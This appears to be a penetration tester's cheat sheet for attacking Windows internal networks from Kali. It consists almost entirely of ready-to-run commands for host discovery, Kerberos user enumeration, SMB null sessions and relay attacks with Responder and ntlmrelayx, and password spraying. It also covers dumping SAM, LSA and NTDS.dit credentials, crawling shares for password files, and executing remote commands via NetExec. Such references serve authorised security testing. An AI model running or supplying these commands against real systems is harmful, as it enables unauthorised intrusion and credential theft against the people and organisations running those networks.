Internal (Kali)

NMap Scans

  • Online Hosts(ICMP):

sudo nmap -sn -iL targets.txt -oG - | grep Up | cut -d' ' -f2 > up-hosts.txt

  • Full Scan:

sudo nmap -sS -Pn -sV --open -iL targets.txt -p- -vv --min-hostgroup 255 --initial-rtt-timeout 150ms --max-rtt-timeout 300ms --max-scan-delay 0 -oA FULL

  • Online Hosts(ICMP):

sudo nmap -sn -iL targets.txt -oG - | grep Up | cut -d' ' -f2 > up-hosts.txt

  • LDAP:

sudo nmap --open -p 389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 389.txt

  • HTTP:

sudo nmap --open -p 80 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 80.txt

  • Alt HTTP:

sudo nmap --open -p 8080 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8080.txt

  • HTTPS:

sudo nmap --open -p 443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 443.txt

  • Alt HTTPS:

sudo nmap --open -p 8443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8443.txt

  • FTP:

sudo nmap --open -p 21 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 21.txt

  • SMB

sudo nmap --open -p 139 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 139.txt
sudo nmap --open -p 445 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 445.txt

  • Determine Which hosts don't have signing

sudo nmap --script=smb2-security-mode.nse -p 445 -iL up-hosts.txt relay.txt

  • SSH:

sudo nmap --open -p 22 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 22.txt

  • RDP:

sudo nmap --open -p 3389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 3389.txt

  • Scan for shares that allow anonymous login

sudo nmap -p 445 --script smb-enum-shares.nse,smb-enum-users.nse -iL targets.txt

  • Scan online hosts for common ports (21,22,80,389,443,3389,8443,8080, and UDP ports)

sudo nmap --open -p 389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 389.txt && sudo nmap --open -p 80 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 80.txt && sudo nmap --open -p 8080 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8080.txt && sudo nmap --open -p 443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 443.txt && sudo nmap --open -p 8443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8443.txt && sudo nmap --open -p 21 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 21.txt && sudo nmap --open -p 22 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 22.txt && sudo nmap --open -p 3389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 3389.txt && sudo nmap --open -p 445 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 445.txt && sudo nmap -Pn -sU -iL up-hosts.txt -p 1-1024,5353,1900 -vvv | grep "/open" | awk '{ print $2 }' > UDP.txt

User Enumeration

I like to use Kerbrute

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum -d DOMAIN --dc DC-IP USERLIST.txt -v -o Outfile.txt

SMB Null Sessions

git clone https://github.com/Raikia/SMBCrunch.git && cd SMBCrunch
sudo ./smbhunt.pl -i ../445.txt

View Null sessions with

sudo smbclient -L //target/share -U ""

SMB Relays

If SMB Signing is not Required for multiple machines, we can attempt to abuse SMB Relays with Responder, NTLMRelayX (From Impacket), and Proxychains.

  1. Disable SMB and HTTP in Responder.conf (/etc/responder/Responder.conf):

sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf

  1. Change the proxychains config (/etc/proxychains4.conf)

sudo sed -i 's/9050/1080/g' /etc/proxychains4.conf

  1. Use NetExec to generate a list of hosts that has SMB signing not required (--gen-relay-list)

sudo netexec smb up-hosts.txt --gen-relay-list relay.txt

  1. Run Responder

sudo python3 /usr/share/responder/Responder.py -I eth0 -PDv --lm

  1. Run NTLMRelayX in a new window/tab while Responder is running.

sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf relay.txt -socks -smb2support -i -of relyed-hashes.txt

When we have capture relays, we can try and crack the captured hashed, but while we crack them we can abuse the relays using NetExec.

  • View Shares hosted on target machine

sudo proxychains4 netexec smb ip -u user -p '' --shares

  • Dump LSA

sudo proxychains4 netexec smb ip -u user -p '' --lsa

Dump SAM hashes

sudo proxychains4 netexec smb ip -u user -p '' --sam

Password Spraying

This method is loud but still worth using

Find the 

git clone https://github.com/absolomb/smbspray.git && cd smbspray
python3 smbspray.py -u users.txt -p passwords.txt -ip DC-IP

Further Enumeration

We can get more information

  • Checking if FTP is open, and if anonymous login is enabled.

  • Checking if SSH is open and if it takes password authentication.

  • Look at all http/https pages for login pages, information disclosure, and default login credentials.

Web Services

sudo ffuf -recursion -mc all -ac -c -e https://domain/FUZZ -w wordlist.txt
sudo ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w wordlist.txt -u https://domain/FUZZ -fc 400,401,403,404,406,500,502 > domain.txt

Post Exploitation

Once we have obtained credentials we can find even more info. I like to find more info from: LDAPDomainDump, Bloodhound (Bloodhound.py), and Manspider.

Bloodhound / Bloodhound-Python

sudo bloodhound-python -u USER -p PASSWORD -ns DNS Server -d DOMAIN -c All

Once we have the .json files, we can ingest them into bloodhound to look for domain admins, kerberoastable accounts, and more.

LDAPDomainDump

sudo ldapdomaindump -u DOMAIN\\USER -p PASSWORD IP

ManSpider

Crawl network shares to find any helpful info, such as files with cleartext passwords, password databases, and more.

  • Search hostname/IP for files with "passw" in the name:

manspider TARGET -f passw -d DOMAIN -u USER -p 'PASSWORD'

  • Search for documents containing passwords

manspider TAGRGET -c passw -d DOMAIN -u USER -p 'PASSWORD'

Common/Useful Netexec Commands

Find ip/hostname/SMB Signinig/etc:

sudo netexec smb targets.txt
sudo netexec smb targets.txt --gen-relay-list relay.txt

Enumerate SAM hashes

sudo netexec smb ip -u user -p 'password' --sam
sudo netexec smb ip -u user -p 'password' --sam --user target-user

Enumerate LSA for potential plaintext passwords

sudo netexec smb ip -u user -p 'password' --lsa

Enumerate shares

sudo netexec smb ip -u user -p 'password' --shares

Pass cmd

sudo netexec smb ip -u user -p 'password' -x 'command'

Pass powershell

sudo netexec smb ip -u user -p 'password' -X 'command'

Look at domain admins

sudo netexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'

Look at logged on users

sudo netexec smb ip -u user -p 'password' --loggedon-users

Look at NTDS.dit

This is LOUD - use it with caution

sudo netexec smb dc-ip -u domain-admin-user -p 'password' --ntds

Find out what machines a user can successfully log onto

This is LOUD - use it with caution

sudo netexec smb targets.txt -u user -p 'password'
sudo netexec smb targets.txt -u user -H 'hash'

Last updated